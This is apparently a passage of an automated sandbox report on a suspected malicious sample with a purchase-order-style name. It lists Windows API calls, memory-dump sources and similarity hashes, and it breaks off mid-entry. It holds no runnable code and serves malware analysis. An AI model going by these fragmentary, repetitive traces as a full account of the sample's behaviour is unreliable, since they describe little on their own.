                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0041CD5F
                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0041CE8C
                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0041CEA5
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1296646539-0
                                                                                                                                                                                                      • Opcode ID: a95f9749c6526a6e85246753ac1fa92aeee7def737737484697f95a748c97b68
                                                                                                                                                                                                      • Instruction ID: 1cbbbf1eee6a61c32d83d92f802d5fff4e9bef6c0e677c0be53b69fc92052790
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a95f9749c6526a6e85246753ac1fa92aeee7def737737484697f95a748c97b68
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1AB13C79900249DBDF10CFA9C9807EEB7B1FF08310F14956AEC59EB250DB34A991CB69
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00AF473A,?,?,00000000), ref: 00AF4543
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00AF473A,?,?,00000000,?,?,?), ref: 00AF45C9
                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00AF46C3
                                                                                                                                                                                                      • __freea.LIBCMT ref: 00AF46D0
                                                                                                                                                                                                        • Part of subcall function 00AF32FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00AF332C
                                                                                                                                                                                                      • __freea.LIBCMT ref: 00AF46D9
                                                                                                                                                                                                      • __freea.LIBCMT ref: 00AF46FE
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1414292761-0
                                                                                                                                                                                                      • Opcode ID: a3355d76feca3b57a3069f657a714d9f7897b256eca8419d7edfe3f41662e12c
                                                                                                                                                                                                      • Instruction ID: 7812b9a43b210f238d159bcdbde8edf932708c75ce02de4f21d77435d9c30304
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3355d76feca3b57a3069f657a714d9f7897b256eca8419d7edfe3f41662e12c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F51C072A0021AABEB259FE4CD41EBF77A9EB49750F154628FE04DB290EB74DC90C650
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00463C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00462BB5,?,?), ref: 00463C1D
                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004630AF
                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004630EF
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00463112
                                                                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046313B
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046317E
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0046318B
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3451389628-0
                                                                                                                                                                                                      • Opcode ID: 924c1986b7ebbad1f92315ec979952a775d0fca8a3793fc76b765aabc7c5acbd
                                                                                                                                                                                                      • Instruction ID: 5892b1df70f304c10d3e3d6946ecdd82f90192a315b1b5be1dc16ffe62a05a2c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 924c1986b7ebbad1f92315ec979952a775d0fca8a3793fc76b765aabc7c5acbd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8516A71504240AFC704EF65C881E6EBBF9FF89308F04492EF55597291EB39EA09CB5A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetMenu.USER32(?), ref: 00468540
                                                                                                                                                                                                      • GetMenuItemCount.USER32(00000000), ref: 00468577
                                                                                                                                                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0046859F
                                                                                                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 0046860E
                                                                                                                                                                                                      • GetSubMenu.USER32(?,?), ref: 0046861C
                                                                                                                                                                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046866D
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Menu$Item$CountMessagePostString
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 650687236-0
                                                                                                                                                                                                      • Opcode ID: a46110f41c534e46656af0250ed6f5c62c57e53ba0c7fed20eca81b6107e52c7
                                                                                                                                                                                                      • Instruction ID: 4a32b333b28820789701f84416726f710a670bfdff4336e242cca42d78ce286a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a46110f41c534e46656af0250ed6f5c62c57e53ba0c7fed20eca81b6107e52c7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1751B371E00214AFCF11DF55C941AAEB7F4EF48314F10456EE906B7391EB78AE418B9A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _memset.LIBCMT ref: 00444B10
                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00444B5B
                                                                                                                                                                                                      • IsMenu.USER32(00000000), ref: 00444B7B
                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 00444BAF
                                                                                                                                                                                                      • GetMenuItemCount.USER32(000000FF), ref: 00444C0D
                                                                                                                                                                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00444C3E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3311875123-0
                                                                                                                                                                                                      • Opcode ID: 3820e9dfeb55f95e393ec268290b3c8c75943d4e144a9b75cad08b804df57059
                                                                                                                                                                                                      • Instruction ID: e6a5e1f3890da4a0aceb300d286543e28b665d01a084fc0334bc1157647a2e2d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3820e9dfeb55f95e393ec268290b3c8c75943d4e144a9b75cad08b804df57059
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B51E070A02259EBEF20CF64D888BAEBBF4EF84318F18411EE4159B291D778D940CB19
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0049DC00), ref: 00458E7C
                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00458E89
                                                                                                                                                                                                      • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00458EAD
                                                                                                                                                                                                      • #16.WSOCK32(?,?,00000000,00000000), ref: 00458EC5
                                                                                                                                                                                                      • _strlen.LIBCMT ref: 00458EF7
                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00458F6A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorLast$_strlenselect
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2217125717-0
                                                                                                                                                                                                      • Opcode ID: 418caecbc6e56f38cfa77f444c88e018a1f28b76f6477bf0aaadda032fcb286f
                                                                                                                                                                                                      • Instruction ID: 492fe9b31153af44185be34426d0c69a1573ed1426ef4a2bf17fc750f9245427
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 418caecbc6e56f38cfa77f444c88e018a1f28b76f6477bf0aaadda032fcb286f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0941E971900104AFC704EB65CD86EAEB7B9AF48315F10466EF916A72D2DF38AE04CB58
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F
                                                                                                                                                                                                      • BeginPaint.USER32(?,?,?), ref: 0041AC2A
                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0041AC8E
                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0041ACAB
                                                                                                                                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0041ACBC
                                                                                                                                                                                                      • EndPaint.USER32(?,?,?,?,?), ref: 0041AD06
                                                                                                                                                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0047E673
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2592858361-0
                                                                                                                                                                                                      • Opcode ID: c2a53bc7bb2e18bad1d35f1806f8f6d7846a0f0a60bb0c4cf28cf667100e6d41
                                                                                                                                                                                                      • Instruction ID: bc17de8597850ac8ecd1a7f4a605dc630b75c4cd4743ccb3255f9716c6cbda2d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2a53bc7bb2e18bad1d35f1806f8f6d7846a0f0a60bb0c4cf28cf667100e6d41
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A541C4706052009FC710DF25DC84FBB7BA8EF5A324F04066EF994872A2D3349895DBAA
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ShowWindow.USER32(004C1628,00000000,004C1628,00000000,00000000,004C1628,?,0047DC5D,00000000,?,00000000,00000000,00000000,?,0047DAD1,00000004), ref: 0046E40B
                                                                                                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 0046E42F
                                                                                                                                                                                                      • ShowWindow.USER32(004C1628,00000000), ref: 0046E48F
                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000004), ref: 0046E4A1
                                                                                                                                                                                                      • EnableWindow.USER32(00000000,00000001), ref: 0046E4C5
                                                                                                                                                                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0046E4E8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 642888154-0
                                                                                                                                                                                                      • Opcode ID: 7e3eddb813cb98a9bf876ffff83290b2429d92cbf2861423786788bc6264c64e
                                                                                                                                                                                                      • Instruction ID: e38680d0e56c83b23c7f5844027bfffcbb6f046283c39d97626a6b1eca441d47
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e3eddb813cb98a9bf876ffff83290b2429d92cbf2861423786788bc6264c64e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A418378601140EFDB25CF36C499B957BE1FF05704F1841BAEA588F2A2DB35E841CB56
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 004498D1
                                                                                                                                                                                                        • Part of subcall function 0041F4EA: std::exception::exception.LIBCMT ref: 0041F51E
                                                                                                                                                                                                        • Part of subcall function 0041F4EA: __CxxThrowException@8.LIBCMT ref: 0041F533
                                                                                                                                                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00449908
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00449924
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044999E
                                                                                                                                                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004499B3
                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 004499D2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2537439066-0
                                                                                                                                                                                                      • Opcode ID: a1eb9348b47650628fea22efe17ecd4995d0f7adb2bb3af9f1f5bd13ea6e4b0f
                                                                                                                                                                                                      • Instruction ID: 6d9c1d8ffcb9c1f7d0860105f5f55980207e4b5724d6ad1e77c4c748931ed47b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1eb9348b47650628fea22efe17ecd4995d0f7adb2bb3af9f1f5bd13ea6e4b0f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13319271A00105ABDB00AF95DD85DAF7778FF44310B1480BAE904AB286D738DE15DB68
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0043AFAE
                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 0043AFB5
                                                                                                                                                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0043AFC4
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000004), ref: 0043AFCF
                                                                                                                                                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0043AFFE
                                                                                                                                                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 0043B012
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1413079979-0
                                                                                                                                                                                                      • Opcode ID: df057fa67cb3837beb8e6d891de21c122c86fc64cd341552d7f9278925da4716
                                                                                                                                                                                                      • Instruction ID: b7a48fbf2d84a4435ac36968e78f9f79161879e2cb968d09ab52d1702d349b35
                                                                                                                                                                                                      • Opcode Fuzzy Hash: df057fa67cb3837beb8e6d891de21c122c86fc64cd341552d7f9278925da4716
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F215072541209AFDF019F94DD09FAE7BA9EF48308F14502AFE41A21A1C37A9D21DB65
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3160817290-0
                                                                                                                                                                                                      • Opcode ID: 56a6cf9403d0a82d611835950dac0b5f8bc3363858d437d148074d05b6c94223
                                                                                                                                                                                                      • Instruction ID: 70ee8bfabb17bf57980d376d6d9f6ebdd0bcf142b656488bac7f1404c947aace
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 56a6cf9403d0a82d611835950dac0b5f8bc3363858d437d148074d05b6c94223
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34F0F933140609AAC22173F4AE06FBA22969BD17A1F640134F71992291FF618C428291
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0041AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0041AFE3
                                                                                                                                                                                                        • Part of subcall function 0041AF83: SelectObject.GDI32(?,00000000), ref: 0041AFF2
                                                                                                                                                                                                        • Part of subcall function 0041AF83: BeginPath.GDI32(?), ref: 0041B009
                                                                                                                                                                                                        • Part of subcall function 0041AF83: SelectObject.GDI32(?,00000000), ref: 0041B033
                                                                                                                                                                                                      • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0046EC20
                                                                                                                                                                                                      • LineTo.GDI32(00000000,00000003,?), ref: 0046EC34
                                                                                                                                                                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0046EC42
                                                                                                                                                                                                      • LineTo.GDI32(00000000,00000000,?), ref: 0046EC52
                                                                                                                                                                                                      • EndPath.GDI32(00000000), ref: 0046EC62
                                                                                                                                                                                                      • StrokePath.GDI32(00000000), ref: 0046EC72
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 43455801-0
                                                                                                                                                                                                      • Opcode ID: ab6dafa2a8e780bd9416af2acd0d5a58d07b6b6bfcf1382a6565474913d09774
                                                                                                                                                                                                      • Instruction ID: a9fbaf3aecc94b696b7302446875f4ff34609ecfac3ca3e8697b261464c7832e
